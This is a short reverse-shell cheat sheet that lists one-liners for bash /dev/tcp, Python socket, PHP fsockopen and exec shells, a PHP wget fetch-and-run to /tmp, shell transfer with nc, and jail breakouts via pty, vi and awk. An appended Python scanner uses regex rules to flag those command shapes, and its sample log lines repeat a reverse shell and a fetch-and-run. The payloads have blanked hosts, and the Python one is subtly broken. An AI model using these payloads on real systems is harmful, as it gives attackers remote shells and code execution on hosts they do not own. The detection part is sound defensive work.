Reverse Shell


connect back at 103 with bash

bash -i >& /dev/tcp/ 0>&1

python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'


php with bash

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'"); ?>


php reverse shell.txt, to host

<?php $sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

to download and execute shell

<?php system("wget -O /tmp/shell.php; php /tmp/shell.php"); ?>


transfer shell with nc

nc -lvp 1234 < php_reverse_shell.php
cmd=nc 123 > reverse-shell.php
-w 1
-q 1

Is it possible to break out of “jail” shell

python -c "import pty; pty.spawn('/bin/bash');"


echo os.system('/bin/bash')

/bin/sh -i

vi -> :sh or :!UNIX_command

awk 'BEGIN{system("/bin/bash")}'
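
Detection side of the command shapes listed above, as an added example that is not part of the original page: a small scanner that flags process-creation records whose command line matches one of them. The key=value log layout, the rule names, the SERVICE_USERS set and the sample records are assumptions made for this example.

```python
import re

# Rule names are this example's own; each regex mirrors a command shape listed on this page.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/")),
    ("python_socket_dup2", re.compile(r"socket\.socket\(.*os\.dup2\(")),
    ("php_fsockopen_shell", re.compile(r"fsockopen\(.*/bin/(ba)?sh")),
    ("fetch_then_run_tmp", re.compile(r"wget\s.*-O\s*/tmp/\S+.*;\s*(php|sh|bash|python)\s+/tmp/")),
    ("pty_spawn_shell", re.compile(r"pty\.spawn\(")),
    ("awk_system_shell", re.compile(r"awk\s.*BEGIN\s*\{\s*system\(")),
]
# Assumption: accounts that run web workloads and should never start an interactive shell.
SERVICE_USERS = {"www-data", "apache", "nginx"}
# Assumed log layout: key=value fields, with cmd= last and holding the full command line.
LINE = re.compile(r"host=(?P<host>\S+) user=(?P<user>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$")

def scan(lines):
    """Return one alert per record whose command line matches at least one rule."""
    alerts = []
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue  # not a process-creation record in the assumed layout
        hits = [name for name, rx in RULES if rx.search(m["cmd"])]
        if hits:
            alerts.append({
                "host": m["host"], "user": m["user"], "pid": int(m["pid"]), "rules": hits,
                "severity": "high" if m["user"] in SERVICE_USERS else "medium",
            })
    return alerts

# Constructed sample records; 192.0.2.0/24 is a documentation-only address range.
SAMPLE = [
    "ts=2024-05-01T10:00:01Z host=web01 user=www-data pid=4312 cmd=bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "ts=2024-05-01T10:00:09Z host=web01 user=deploy pid=4313 cmd=python -c import pty; pty.spawn('/bin/bash');",
    "ts=2024-05-01T10:02:30Z host=web01 user=deploy pid=4400 cmd=awk -F: {print $1} /etc/passwd",
    "ts=2024-05-01T10:05:12Z host=web02 user=www-data pid=512 cmd=sh -c wget http://192.0.2.10/s.txt -O /tmp/shell.php; php /tmp/shell.php",
    "ts=2024-05-01T10:06:00Z host=web02 user=root pid=600 cmd=wget https://example.org/pkg.tar.gz -O /tmp/pkg.tar.gz",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The two benign records (plain awk field printing, a wget download that is never executed) produce no alert, which is the false-positive check to repeat against your own baseline before deploying rules like these.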

